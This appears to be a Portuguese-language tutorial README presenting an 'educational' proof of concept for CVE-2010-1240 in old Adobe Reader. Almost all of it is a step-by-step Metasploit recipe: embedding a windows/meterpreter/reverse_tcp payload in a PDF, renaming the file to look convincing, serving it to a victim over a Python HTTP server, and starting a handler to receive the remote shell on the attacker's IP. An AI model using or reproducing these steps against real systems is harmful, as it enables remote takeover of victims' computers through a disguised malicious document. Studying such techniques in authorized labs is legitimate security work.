
Prova de conceito educacional demonstrando como incorporar um backdoor Meterpreter em um arquivo PDF explorando CVE-2010-1240, com instruções passo a passo do Metasploit para testes de segurança autorizados.
⚠️ Apenas para fins educacionais e de pesquisa de segurança autorizada
O Adobe Reader e o Acrobat 9.x anteriores à versão 9.3.3, e 8.x anteriores à 8.2.3 no Windows e Mac OS X, não restringem o conteúdo de um campo de texto na caixa de diálogo de aviso do Launch File, o que facilita que atacantes remotos enganem usuários a executar um programa local arbitrário especificado em um documento PDF, como demonstrado por um campo de texto que afirma que o botão Open permitirá ao usuário ler uma mensagem criptografada.

Primeiro, execute o msfconsole
msfconsole
Em seguida, defina o payload para incorporar o pdf
use exploit/windows/fileformat/adobe_pdf_embedded_exe
defina a opção INFILENAME e forneça o caminho direto para o arquivo pdf original
set INFILENAME /home/kali/Downloads/certificate-foundations-of-threat-hunting-60c893e734422a67991e093c.pdf
defina o nome do novo arquivo PDF malicioso para algo mais convincente, definindo a opção FILENAME
set FILENAME laporan.pdf
Encontre e incorpore o payload no arquivo PDF
set payload windows/meterpreter/reverse_tcp
Defina a opção LHOST para o IP do atacante
set LHOST 172.16.10.10
Abra um novo terminal e navegue até o local do arquivo PDF malicioso
cd .msf4/local/
Crie um servidor temporário em python
python -m http.server
Baixe o arquivo PDF malicioso na máquina da vítima
http://172.16.10.10:8000/certificate.pdf
Antes de executar o arquivo PDF malicioso na máquina da vítima, inicie o listener no terminal anterior
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.10.10
exploit
Assim que o arquivo PDF malicioso for executado na máquina da vítima, você obterá conexão com a máquina da vítima